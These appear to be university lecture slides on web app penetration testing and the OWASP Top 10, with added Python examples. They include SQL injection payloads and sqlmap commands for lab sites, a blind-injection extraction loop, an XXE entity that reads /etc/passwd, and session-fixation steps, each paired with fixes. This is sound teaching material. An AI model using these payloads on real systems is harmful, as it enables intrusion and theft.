Web App Security: Vulnerability Assessment and Penetration Testing of web apps
Alfonso Solimeo
Bologna, 28/11/2019. Copyright CryptoNet Labs srl
AGENDA
• SAMM – Software Assurance Maturity Model
• Vulnerability Assessment & Penetration Test
• OWASP Top 10 2017
OWASP (Open Web Application Security Project)
• Since 2001
• Not-for-profit charitable organization
• Dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted
https://www.owasp.org/index.php/Marketing/Resources
SAMM: Software Assurance Maturity Model
The Software Assurance Maturity Model (SAMM) is an OWASP project. It is an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. SAMM was defined with flexibility in mind, so that it can be used by small, medium, and large organizations using any style of development. Additionally, the model can be applied organization-wide, to a single line of business, or even to an individual project.
https://owaspsamm.org/
SAMM – Business Functions
Start with the core activities tied to any organization performing software development. They are named generically, but should resonate with any developer or manager.
SAMM – Business Functions: Governance
Governance is centered on the processes and activities related to how an organization manages overall software development activities. More specifically, this includes concerns that impact cross-functional groups involved in development, as well as business processes that are established at the organization level.
Governance security practices (SAMM 1.x names):
• Strategy & Metrics: establish the framework for a software security assurance program. It must be both measurable and aligned with the organization's real business risk.
• Policy & Compliance: understand and meet external legal and regulatory requirements. Drive internal security standards to ensure compliance. Focus on project-level audits.
• Education & Guidance: arm personnel involved in the software life cycle with the knowledge and resources to design, develop, and deploy secure software. Project teams will be better able to proactively identify and mitigate the specific security risks that apply to their organization.
SAMM – Business Functions: Construction
Construction concerns the processes and activities related to how an organization defines goals and creates software within development projects. In general, this includes product management, requirements gathering, high-level architecture specification, detailed design, and implementation.
Construction security practices (SAMM 1.x names):
• Threat Assessment: identify and characterize potential attacks upon an organization's software in order to better understand the risks and facilitate risk management.
• Security Requirements: promote the inclusion of security-related requirements during the software development process in order to specify correct functionality from inception.
• Secure Architecture: bolster the design process with activities that promote secure-by-default designs and control over the technologies and frameworks upon which software is built.
SAMM – Business Functions: Verification
Verification is focused on the processes and activities related to how an organization checks and tests the artifacts produced throughout software development. This typically includes quality assurance work such as testing, but it can also include other review and evaluation activities.
Verification security practices (SAMM 1.x names):
• Design Review: assessment of software design and architecture for security-related problems. Detect architecture-level issues early in software development and avoid potentially large refactoring costs later.
• Code Review: inspection of software at the source code level in order to find security vulnerabilities. Start with lightweight checklists and inspect the most critical software modules; add automation to improve coverage and efficacy.
• Security Testing: inspection of software in the runtime environment, making visible operational misconfigurations or errors in business logic that are difficult to find otherwise. Penetration testing and test automation.
SAMM – Business Functions: Operations
Operations entails the processes and activities related to how an organization manages the software releases that have been created. This can involve shipping products to end users, deploying products to internal or external hosts, and normal operation of the software in the runtime environment.
Operations security practices (SAMM 1.x names):
• Vulnerability Management: processes to handle vulnerability reports and operational incidents. Assignment of roles in the event of an incident to improve visibility and tracking of the issues that occur. Dissection of incidents and vulnerability reports to collect metrics and root-cause information.
• Environment Hardening: build assurance for the runtime environment. Tracking and distributing information about the operating environment to keep development teams better informed. Deployment of protection tools to add layers of defenses and safety nets.
• Operational Enablement: gather security-critical information from the project teams building the software and communicate it to the users and operators of the software.
SAMM – Security Practices
• Each Business Function defines three Security Practices
• The Security Practices cover all areas relevant to software security assurance
Security Testing is a process intended to reveal flaws in the security mechanisms of an information system.
VA vs PT
https://www.immuniweb.com/blog/how_to_keep_your_website_safe_in_2015.html
VA vs PT
• Vulnerability Assessment (VA): discovers which vulnerabilities are possibly present, but does not try to exploit them. Typically automated, so its output must be triaged for false positives.
• Penetration Test (PT): simulates an attacker's attempts to get into a system, in order to find exploitable flaws and measure the severity of each. Conducted by human beings.
https://www.alienvault.com/blogs/security-essentials/penetration-testing-vs-vulnerability-scanning-whats-the-difference
VAPT phases (diagram): Network Mapping, Port Scanning, Service Fingerprinting, OS Fingerprinting, Vulnerability Scanning
Discovery (diagram: the target host reached from the Internet)
Discovery
nmap -sS -sU -O -sV mysite.com
...
PORT    STATE SERVICE VERSION
123/udp open  ntp     udp-response ttl 57 NTP v4
22/tcp  open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3
80/tcp  open  http    Apache httpd 2.4.7 ((Ubuntu))
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
...
Notes: -sS, -sU and -O need raw-socket privileges, so run nmap as root. The -sV banners are what the version lookups in the next slides are keyed on, but a banner is only a hint: a distribution may backport a fix without changing the version string, so a "vulnerable version" finding still has to be confirmed.
Vulnerability Scanning
In general: different checks depending on the type of service.
Common checks:
• software versions
• encryption of communications
• strength of the authentication mechanisms
Web application VAPT: analysis of the web services.
Vulnerable software versions
CVE (Common Vulnerabilities and Exposures)
• CVE is a list of common identifiers for publicly known cyber security vulnerabilities
Vulnerable software versions
https://www.cvedetails.com/
Vulnerable software versions
https://www.exploit-db.com/
OK… now, «HACK THE PLANET!»
What are the most dangerous vulnerabilities? How can I find and exploit them? How difficult is it?
OWASP Top 10 - 2017 (arrow = trend versus the 2013 list)
➡ A1:2017 – Injection
➡ A2:2017 – Broken Authentication
↘ A3:2017 – Sensitive Data Exposure
A4:2017 – XML External Entities (XXE)
↘ A5:2017 – Broken Access Control
↗ A6:2017 – Security Misconfiguration
↘ A7:2017 – Cross-Site Scripting (XSS)
A8:2017 – Insecure Deserialization
➡ A9:2017 – Using Components with Known Vulnerabilities
A10:2017 – Insufficient Logging & Monitoring
A1 – Injection
Untrusted data is sent to an interpreter as part of a command or query. The data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
https://xkcd.com/327/
A1 – Injection (SQL Injection)
String query = "SELECT * FROM accounts WHERE acct='" + httpParam + "'";
With httpParam = ' OR 1=1-- the query sent to the database becomes:
SELECT * FROM accounts WHERE acct='' OR 1=1--'
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards the attack to the database in a SQL query
4. Database runs the query containing the attack and sends the results back to the application
5. Application processes the data as normal and sends the results to the user
(Diagram: HTTP request → query → DB table → HTTP response; the response shows an Account Summary listing every account: Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293)
A1 – Injection (SQL Injection): Blind SQL Injection
The vulnerable application does not write the query results into the web page, but shows a generic error page. To extract data you have to send a large number of requests to the server, each phrased as a true/false question, and tell the answers apart by:
• response times, using SLEEP (and similar functions) → Time Based
• differences in the error pages → Boolean Based
https://www.acunetix.com/websitesecurity/sql-injection2/
A1 – Injection
Impact
• The entire database can usually be read or modified
• May also allow access to the full database schema, to accounts, or even to the OS
Recommendations
• Use an interface that supports bind variables (prepared statements / parameterized queries; stored procedures only if they do not build dynamic SQL themselves)
• Escape user input before passing it to the interpreter only as a fallback where binding is impossible, e.g. for table or column names, which should then be validated against an allow-list
• Always minimize database privileges to reduce the impact of a flaw
Hands On! – SQL Injection (1)
Starting URL: http://php.testsparker.com/artist.php?id=test
Test 1: http://php.testsparker.com/artist.php?id=1
Test 2: http://php.testsparker.com/artist.php?id=1%20OR%201=1
Test 3 (time based, MySQL): http://php.testsparker.com/artist.php?id=1 OR 1=(SELECT SLEEP(10))
Hands On! – SQL Injection (2)
Boolean-based guessing of the number of databases, one value at a time:
Test 4: http://php.testsparker.com/artist.php?id=1 OR 1=(SELECT COUNT(*) FROM information_schema.SCHEMATA)
Test 5: http://php.testsparker.com/artist.php?id=1 OR 2=(SELECT COUNT(*) FROM information_schema.SCHEMATA)
…
Test 9: http://php.testsparker.com/artist.php?id=1 OR 6=(SELECT COUNT(*) FROM information_schema.SCHEMATA)
Hands On! – SQL Injection (3)
Test 10: feed the URL http://php.testsparker.com/artist.php?id=test to sqlmap and let it exploit the vulnerability automatically:
• sqlmap -u "http://php.testsparker.com/artist.php?id=test" --level=3 -v 3
• sqlmap -u "http://php.testsparker.com/artist.php?id=test" --level=3 -v 3 --tables
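As an added example, not part of the slides or of the lab application: the same steps (an injectable query, the 1 OR 1=1 check, and the count-the-schemata guessing of Tests 4-9 generalised into a boolean-based blind extraction loop) against a constructed in-memory SQLite database. The tables, the data and the ?id= handler are assumptions; SQLite has no SLEEP(), so the time-based variant is not shown, and its catalogue is sqlite_master rather than information_schema.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the lab's database (not php.testsparker.com's data)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE artist (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO artist VALUES (1, 'Artist One'), (2, 'Artist Two'), (3, 'Artist Three');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t');
        """
    )
    return con


def artist_vulnerable(con: sqlite3.Connection, artist_id: str) -> list:
    """The artist.php?id= pattern: the parameter is concatenated into the SQL text."""
    query = "SELECT id, name FROM artist WHERE id=" + artist_id
    return con.execute(query).fetchall()


def artist_fixed(con: sqlite3.Connection, artist_id: str) -> list:
    """Bind variable: the parameter travels as a value and can never become SQL."""
    try:
        value = int(artist_id)
    except ValueError:
        return []
    return con.execute("SELECT id, name FROM artist WHERE id=?", (value,)).fetchall()


def oracle(con: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind oracle. Baseline id=1 returns one row; 'id=1 OR (<true>)'
    returns every row, so the row count answers a yes/no question about the database."""
    return len(artist_vulnerable(con, f"1 OR ({condition})")) > 1


def count_tables(con: sqlite3.Connection) -> int:
    """Tests 4-9 of the hands-on, generalised: try n = 1, 2, ... until the oracle says yes."""
    for n in range(1, 100):
        if oracle(con, f"{n}=(SELECT COUNT(*) FROM sqlite_master WHERE type='table')"):
            return n
    raise RuntimeError("table count not found below 100")


def extract_string(con: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Extracts the result of a scalar subquery one character at a time, binary-searching
    each code point with about 7 requests instead of trying every character."""
    result = ""
    for pos in range((1), max_len + 1):
        if not oracle(con, f"LENGTH(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"UNICODE(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result
```

The same oracle() drives both extraction routines; against a real target it would be an HTTP request whose result is classified by response length, status code or timing, which is exactly what sqlmap automates.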
A2 – Broken Authentication
Application functions related to authentication and session management are not implemented correctly. Attackers can compromise passwords, keys, or session tokens to assume other users' identities.
A2 – Broken Authentication: Session Fixation
http://www.maravis.com/library/session-fixation-attack/
A2 – Broken Authentication: vulnerable confirmation email (predictable, unauthenticated user ids)
1. The attacker registers on the site
2. The server assigns the attacker id 2000 and sends a confirmation email with the link: http://www.site.com/userconfirmation/2000
3. The attacker visits the link received
4. The server responds with a session cookie associated with user 2000
5. The attacker tries the URL: http://www.site.com/userconfirmation/1999
6. The server responds with a session cookie associated with user 1999
A2 – Broken Authentication
Impact
• User accounts or user sessions compromised
Recommendations
• Use the standard session id provided by your container (JSESSIONID, PHPSESSID, …) rather than a home-made one, and regenerate it on login
• Use HTTPS and set the HttpOnly and Secure flags on cookies
• Verify that logoff actually destroys the session server-side
• Beware the side doors: change my password, forgot my password, secret question, logout, email address verification…
A2 – Broken Authentication: Cookie Flags
• HttpOnly: the cookie cannot be accessed through client-side script. Historically bypassable via XST (Cross-Site Tracing), so disable the HTTP TRACE method.
• Secure: the cookie is only sent over an HTTPS connection.
Set-Cookie: <name>=<value>[; <name>=<value>] [; expires=<date>][; domain=<domain_name>] [; path=<some_path>][; secure][; HttpOnly]
Hands On! – Session Fixation (1)
URL with the login form: http://php.testsparker.com/auth/login.php
Test 1: visit the URL and observe in Burp how the session cookie is generated
Test 2: enter the credentials and observe in Burp that no new session cookie is generated after login
Hands On! – Session Fixation (2)
Test 3: scenario in which attacker and victim share the same PC
Attacker:
• opens the URL http://php.testsparker.com/auth/login.php
• copies the cookie generated by the server into a text file, saves the file on a USB stick and walks away from the PC
Victim (on the same PC the attacker just used):
• opens the URL http://php.testsparker.com/auth/login.php
• logs in
Attacker (from another PC):
• opens the URL http://php.testsparker.com/auth/internal.php and gets redirected to the login page
• sets the previously saved cookie in their own browser
• opens the URL http://php.testsparker.com/auth/internal.php again and gets the same page shown to the authenticated victim
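Added example, not the lab application's code: a constructed session store with two login handlers, one that keeps the pre-authentication session id (the behaviour seen in Test 2) and one that rotates it, plus Test 3 replayed as a function, and a checker for the two cookie flags from the previous slide. The store, the credentials and the cookie names are assumptions.

```python
import secrets


class SessionStore:
    """Constructed server-side store: session id -> {'user': ...}. Ids come from a CSPRNG,
    never from a counter (compare the guessable user ids in the confirmation-email slide)."""

    def __init__(self):
        self.sessions = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid: str):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


CREDENTIALS = {"victim": "correct horse"}   # constructed


def password_ok(username: str, password: str) -> bool:
    return CREDENTIALS.get(username) == password


def login_keeps_sid(store: SessionStore, sid: str, username: str, password: str) -> str:
    """What the lab app does: the pre-authentication cookie is simply upgraded to 'logged in'."""
    if password_ok(username, password):
        store.sessions.setdefault(sid, {"user": None})["user"] = username
    return sid


def login_rotates_sid(store: SessionStore, sid: str, username: str, password: str) -> str:
    """Fix: on successful authentication invalidate the old id and issue a new one."""
    if not password_ok(username, password):
        return sid
    store.sessions.pop(sid, None)
    new_sid = store.new_session()
    store.sessions[new_sid]["user"] = username
    return new_sid


def fixation_succeeds(login) -> bool:
    """Replays Test 3: the attacker fetches login.php and saves the cookie, the victim logs in from
    the same browser, the attacker presents the saved cookie elsewhere. True = attacker is the victim."""
    store = SessionStore()
    saved_sid = store.new_session()
    login(store, saved_sid, "victim", "correct horse")
    return store.user_for(saved_sid) == "victim"


def set_cookie(name: str, value: str, max_age: int = 1800) -> str:
    """Set-Cookie line carrying the two flags from the slide: Secure and HttpOnly."""
    return f"Set-Cookie: {name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly"


def missing_cookie_flags(set_cookie_line: str) -> list:
    """What to look for in Burp: the protective attributes a Set-Cookie line lacks."""
    attributes = set_cookie_line.split(":", 1)[-1].split(";")[1:]
    present = {a.strip().split("=", 1)[0].lower() for a in attributes}
    return [flag for flag in ("secure", "httponly") if flag not in present]
```

Rotating the id on every privilege change (login, but also password change and role elevation) is what makes a fixed id worthless; the flags only limit where the cookie can leak from.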
A3 – Sensitive Data Exposure
The application does not properly protect sensitive data (credit cards, authentication credentials…).
• Failure to identify all the places where data is stored or sent (web pages, third-party websites…)
• Failure to protect data at rest (databases, log files, backups…)
• Failure to protect data in transit (browser to web server, web server to database server…)
A3 – Sensitive Data Exposure: Man in the Middle (diagram)
A3 – Sensitive Data Exposure: Insecure Storage (diagram)
1. Victim enters a credit card number in a form
2. The error handler logs the card details because the merchant gateway is unavailable
3. The log files are accessible to all members of the IT staff for debugging purposes
4. A malicious insider steals 4 million credit card numbers from the log files
A3 – Sensitive Data Exposure
Impact
• Attackers access or modify confidential or private information
• Attackers extract secrets to use in additional attacks
Recommendations
• Identify all sensitive data
• Identify all the places where that data is stored
• Identify all the places where that data is sent
• Use encryption
• Correctly implement encryption!
A3 – Sensitive Data Exposure: Real Case! (a major Italian bank)
• Hundreds of weak iNotes password hashes exposed
• hashcat + (huge) dictionary + limited computing power = 30% of the passwords recovered
Hands On! – Man in the middle
Test 1: use Burp to verify that the credentials from the login form at http://php.testsparker.com/auth/login.php are sent in clear text via POST
Test 2: use Burp to verify that the credentials from the login form at http://google-gruyere.appspot.com/XXXXXXXXXXXXXXX/login (reachable from https://google-gruyere.appspot.com/start) are sent in clear text via GET, i.e. in the URL, where they also end up in server logs, proxy logs and the browser history
A4 – XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, to reach internal file shares, for internal port scanning, remote code execution, and denial of service attacks.
A4 – XML External Entities (XXE)
XML (eXtensible Markup Language)…
• is a markup language: it defines a set of rules for encoding documents (like HTML);
• does not use predefined tags (unlike HTML);
• is also used for storing and transporting data (did you say AJAX?)
DTD (Document Type Definition)…
• defines the structure and what an XML document can contain;
• is declared within the optional DOCTYPE element at the start of the XML document (self-contained, external, or hybrid)
A4 – XML External Entities (XXE)
XML entity…
• is a symbolic representation of data;
• the entity is written instead of the data: &lt; for <, &gt; for >
• custom (defined within the DTD) or external (declared within the DTD, defined outside)
Custom (internal) entity, in standard DTD syntax: <!DOCTYPE foo [ <!ENTITY greeting "Hello"> ]>, then &greeting; in the document body
External entity: <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>, then &xxe; in the body, which a parser that resolves external entities replaces with the contents of the file
A4 – XML External Entities (XXE) (diagram)
Normal flow: (1) the client sends XML, (2) the XML parser processes it, (3) the application works on the content, (4) the response goes back.
XXE flow: the same four steps, but the XML declares an external entity pointing at /etc/passwd; the parser reads that file while expanding the entity and its contents end up in the response.
A4 – XML External Entities (XXE)
Impact
• Attackers extract data and make the server issue requests on their behalf
• Attackers extract secrets to use in additional attacks
Recommendations
• Use, if possible, less complex data formats (JSON)
• Upgrade the XML processors and the SOAP environment
• Disable external entity and DTD processing in every XML parser the application uses
• Validate the input
Hands On! – XXE
Test 1: at https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files you can access a demo after registering (the site is extremely useful!). Use the "Check Stock" feature inside the demo and exploit the XXE vulnerability.
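Added example, not from the slides or the PortSwigger lab: the "Check Stock" request rebuilt locally with Python's standard library. The vulnerable function deliberately re-enables external general entities in xml.sax (off by default since Python 3.7.1, which is why modern Python is not affected out of the box) and leaks a constructed temporary file standing in for /etc/passwd; the hardened function refuses any DTD up front and then parses with ElementTree, which does not resolve external entities. The element names and the file path are assumptions.

```python
import io
import os
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def build_xxe_payload(target_path: str) -> bytes:
    """Constructed request body shaped like the lab's 'Check Stock' XML: an external
    entity pointing at a local file is referenced inside <productId>."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    ).encode()


class _ProductIdCollector(ContentHandler):
    """Collects the text of <productId>, including text pulled in by entity expansion."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._inside = False

    def startElement(self, name, attrs):
        if name == "productId":
            self._inside = True

    def endElement(self, name):
        if name == "productId":
            self._inside = False

    def characters(self, data):
        if self._inside:
            self.chunks.append(data)


def product_id_vulnerable(body: bytes) -> str:
    """Server-side parse with external general entities enabled: the XXE misconfiguration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the dangerous setting
    collector = _ProductIdCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return "".join(collector.chunks)


def product_id_hardened(body: bytes) -> str:
    """Defence in depth: refuse any DTD before parsing, then use ElementTree, which does not
    fetch external entities (an undeclared entity is a parse error, not a file read)."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        raise ValueError("DTDs and entity declarations are not accepted")
    root = ET.fromstring(body)
    return root.findtext("productId", default="")


def demo() -> tuple:
    """Returns (text leaked by the vulnerable parser, whether the hardened parser refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")   # constructed stand-in for /etc/passwd
        with open(secret, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash")
        payload = build_xxe_payload(secret)
        leaked = product_id_vulnerable(payload)
        try:
            product_id_hardened(payload)
            refused = False
        except ValueError:
            refused = True
    return leaked, refused
```

The DOCTYPE check is the cheap, parser-independent control; the parser setting is the real one, and it has to be applied to every library that touches XML (SOAP stacks, SAML, document converters), which is why the slide says to upgrade and reconfigure the whole environment.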
A5 – Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as other users' accounts, sensitive files, other users' data, access rights, etc.
A5 – Broken Access Control
https://www.onlinebank.com/user?id=6065
1. The attacker is a user of the site
2. They try changing the value of the id parameter
3. They gain access to the other users' pages
A5 – Broken Access Control
Impact
• Users are able to access unauthorized files or data
Recommendations
• Eliminate the direct object reference: replace it with a temporary, per-user mapping value (e.g. 1, 2, 3, or a random handle) that the server resolves to the real id
• Restrict access to authenticated users (if the resource is not public)
• Enforce user- or role-based permissions on every request (if the resource is private), server-side, regardless of whether the link is shown in the UI
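Added example, not the bank's code: the user?id=6065 handler written three ways over constructed accounts, with a function that replays the slide's three steps to see which version an attacker can abuse. The account data, user names and handle format are assumptions.

```python
import secrets

# Constructed accounts: the logged-in attacker (mallory) owns 6066, the victim (alice) owns 6065.
ACCOUNTS = {
    6065: {"owner": "alice", "balance": 1200},
    6066: {"owner": "mallory", "balance": 5},
}


def user_page_unchecked(current_user: str, requested_id: int) -> dict:
    """onlinebank.com/user?id=6065 as the slide describes it: the id is looked up as-is."""
    return ACCOUNTS[requested_id]


def user_page_checked(current_user: str, requested_id: int) -> dict:
    """Same direct reference, but ownership is verified on every request. Unknown and foreign
    ids get the same answer, so valid ids cannot be enumerated from the error."""
    account = ACCOUNTS.get(requested_id)
    if account is None or account["owner"] != current_user:
        raise PermissionError("forbidden")   # answer 403 and log the attempt (see A10)
    return account


class IndirectReferenceMap:
    """The 'temporary mapping value' from the recommendations: the client only ever sees random,
    per-session handles; real ids stay on the server and only the user's own objects are mapped."""

    def __init__(self, current_user: str):
        self._handles = {
            secrets.token_urlsafe(8): acct_id
            for acct_id, account in ACCOUNTS.items()
            if account["owner"] == current_user
        }

    def handles(self) -> list:
        return list(self._handles)

    def resolve(self, handle: str) -> dict:
        acct_id = self._handles.get(handle)
        if acct_id is None:
            raise PermissionError("forbidden")
        return ACCOUNTS[acct_id]


def idor_possible(view) -> bool:
    """Steps 1-3 of the slide: can mallory read alice's account through `view`?"""
    try:
        return view("mallory", 6065)["owner"] == "alice"
    except PermissionError:
        return False
```

The indirect map removes the guessable id from the URL, but it is the ownership check that actually enforces authorization; both together are the usual answer.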
A6 – Security misconfiguration
The application is missing proper security hardening across one or more parts of the application stack:
• OS
• Web/App Server
• DBMS
• Code libraries
• Unnecessary features enabled or installed (e.g. services, pages)
• Default accounts enabled with their passwords unchanged
• Error pages showing overly informative error messages to users
A6 – Security misconfiguration: Test Account
1. The attacker enumerates the WordPress users
2. The attacker tries the test account with: Username: test, Password: test
A6 – Security misconfiguration
Impact
• Attackers install a backdoor through missing OS or server patches
• Unauthorized access to default accounts, application functionality or data
Recommendations
• Verify your system's configuration management
• Be aware of the configuration of your components
A6 – Security misconfiguration: SSL/TLS
• No SSL, no TLSv1.0; TLSv1.1 and TLSv1.2 OK at the time of the talk (TLSv1.1 has since been deprecated as well, by RFC 8996 in 2021, so today TLSv1.2 is the floor)
• Ciphers:
  • No RC2, RC4, NULL, Export…
  • Possibly no DES (including 3DES)
  • 128+ bit ciphers
  • Forward Secrecy ciphers (ECDHE/DHE key exchange)
• Use 2048-bit private keys
• Signature: no SHA-1, OK SHA-2 family
• No client-initiated renegotiation
• Watch for new vulnerability alerts!
Check HTTPS configuration
https://www.ssllabs.com/ssltest/analyze.html
https://www.immuniweb.com/ssl/
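Added example, not from the slides: the slide's rules turned into an offline check with Python's ssl module. hardened_server_context() builds a server context that satisfies them (the certificate and 2048-bit key are left to the caller, since the paths are not on the page), and audit_cipher()/context_issues() report which rules a cipher suite or a whole context breaks, using the dictionaries that SSLContext.get_ciphers() returns. The cipher string and the six-month threshold are my choices.

```python
import ssl

# Names the slide's rules exclude: RC2, RC4, NULL, export suites, (3)DES.
WEAK_MARKERS = ("RC2", "RC4", "NULL", "EXP", "DES")


def audit_cipher(cipher: dict) -> list:
    """Issues for one entry of SSLContext.get_ciphers() (keys used: name, strength_bits, kea);
    an empty list means the suite meets the slide's rules."""
    issues = []
    name = cipher["name"].upper()
    if any(marker in name for marker in WEAK_MARKERS):
        issues.append("weak or export-grade algorithm")
    if cipher.get("strength_bits", 0) < 128:
        issues.append("fewer than 128 bits")
    kea = cipher.get("kea", "").upper()
    # Ephemeral ECDH/DH gives forward secrecy; TLS 1.3 suites report 'kx-any' and always have it.
    if not ("ECDH" in kea or kea.startswith("DH") or "ANY" in kea):
        issues.append("no forward secrecy (static RSA key exchange)")
    return issues


def hardened_server_context() -> ssl.SSLContext:
    """Server context following the slide: TLS 1.2 as the floor (1.1 is deprecated today),
    forward-secret AEAD suites only, no compression, no client-initiated renegotiation.
    Call load_cert_chain() on the result with the site's certificate and 2048-bit key."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL:!MD5:!RC4:!3DES")
    ctx.options |= ssl.OP_NO_COMPRESSION                    # CRIME
    ctx.options |= getattr(ssl, "OP_NO_RENEGOTIATION", 0)   # absent on very old OpenSSL builds
    return ctx


def context_issues(ctx: ssl.SSLContext) -> list:
    """Audit of a configured context: the protocol floor plus every enabled suite."""
    issues = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        issues.append(f"minimum protocol is {ctx.minimum_version.name}")
    for cipher in ctx.get_ciphers():
        for problem in audit_cipher(cipher):
            issues.append(f"{cipher['name']}: {problem}")
    return issues
```

This audits what the server offers; the online scanners on the slide additionally check what it actually negotiates, the certificate chain and the signature algorithm, so use both.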
A6 – Security misconfiguration: HTTP Headers
• Browser-based layer of security
• Not completely cross-browser
• X-Frame-Options: allow/deny embedding within <frame>, <iframe>, <object>
  • IE 8+, Chrome 4.1.249.1042+, Firefox 3.6.9+, Safari 4.0+, Opera 10.50+
  • X-Frame-Options: DENY
  • X-Frame-Options: SAMEORIGIN
  • X-Frame-Options: ALLOW-FROM http://trusted-origin.com (never supported by Chrome or Safari and since dropped by the others; use the Content-Security-Policy frame-ancestors directive instead)
A6 – Security misconfiguration: HTTP Headers
• Cache-Control: permit/prevent the caching of responses containing sensitive data
  • IE 6+, Chrome, Firefox, Safari, Opera
  • Cache-Control: no-store
  • Pragma: no-cache (for HTTP 1.0 compatibility)
  • Expires: 0 (for HTTP 1.0 compatibility)
• Content-Security-Policy: tells the browser which origins it may load resources (e.g. JavaScript) from and blocks the rest; helps mitigate e.g. XSS, as long as the policy does not allow 'unsafe-inline' scripts
  • Content-Security-Policy: default-src 'self'
A6 – Security misconfiguration: HTTP Headers
• Other:
  • HTTP Strict-Transport-Security (HSTS)
  • X-Content-Type-Options
  • X-XSS-Protection (controls the browser's XSS auditor, which Chrome and Edge have since removed and Firefox never had; rely on CSP and output encoding instead)
• https://appsec-labs.com/portal/improve-your-web-apps-security-with-http-headers/
Check HTTP headers configuration
https://securityheaders.com/
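Added example, not the securityheaders.com scanner: an offline audit of one response's headers against the three slides above, taking the header dictionary as you would copy it out of Burp. The findings, thresholds (180 days for HSTS) and the version-disclosure check on Server/X-Powered-By are my choices; the sample responses are constructed.

```python
import re


def audit_security_headers(headers: dict, sensitive: bool = True) -> list:
    """Returns (header, finding) pairs for one HTTP response; names match case-insensitively.
    `sensitive` says whether the response carries data that must not be cached."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    csp = h.get("content-security-policy", "")
    xfo = h.get("x-frame-options", "").upper()
    if "frame-ancestors" not in csp:   # a CSP frame-ancestors directive supersedes X-Frame-Options
        if not xfo:
            findings.append(("X-Frame-Options", "missing: the response can be framed (clickjacking)"))
        elif xfo.startswith("ALLOW-FROM"):
            findings.append(("X-Frame-Options", "ALLOW-FROM is ignored by current browsers; use CSP frame-ancestors"))

    if not csp:
        findings.append(("Content-Security-Policy", "missing"))
    elif "'unsafe-inline'" in csp:
        findings.append(("Content-Security-Policy", "'unsafe-inline' allowed; XSS mitigation is weak"))

    hsts = re.search(r"max-age=(\d+)", h.get("strict-transport-security", ""), re.I)
    if not hsts:
        findings.append(("Strict-Transport-Security", "missing"))
    elif int(hsts.group(1)) < 180 * 24 * 3600:
        findings.append(("Strict-Transport-Security", "max-age shorter than 180 days"))

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append(("X-Content-Type-Options", "missing 'nosniff'"))

    if sensitive and "no-store" not in h.get("cache-control", "").lower():
        findings.append(("Cache-Control", "sensitive response may be cached; use 'no-store'"))

    for key, shown in (("server", "Server"), ("x-powered-by", "X-Powered-By")):
        if re.search(r"\d+\.\d+", h.get(key, "")):
            findings.append((shown, "discloses a software version (feeds the A9 checks)"))
    return findings


# Constructed responses: one typical of an unhardened PHP host, one with every slide applied.
WEAK_RESPONSE = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-Powered-By": "PHP/5.5.9-1ubuntu4",
    "Content-Type": "text/html",
}
HARDENED_RESPONSE = {
    "Server": "Apache",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
    "Pragma": "no-cache",
    "Expires": "0",
}
```

Run it over the login and account pages rather than the home page: the Cache-Control finding only matters where the response actually contains session data or personal information.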
Hands On! – HTTPS configuration
Test 1: check the HTTPS configuration of studenti.unibo.it via https://www.ssll.com/ssltest/analyze.html
Test 2: check the HTTPS configuration of studenti.unibo.it via https://www.immuniweb.com/ssl/
Hands On! – HTTP header configuration
Test 1: check the HTTP header configuration of php.testsparker.com via https://securityheaders.com/
Test 2: check the HTTP header configuration of studenti.unibo.it via https://securityheaders.com/
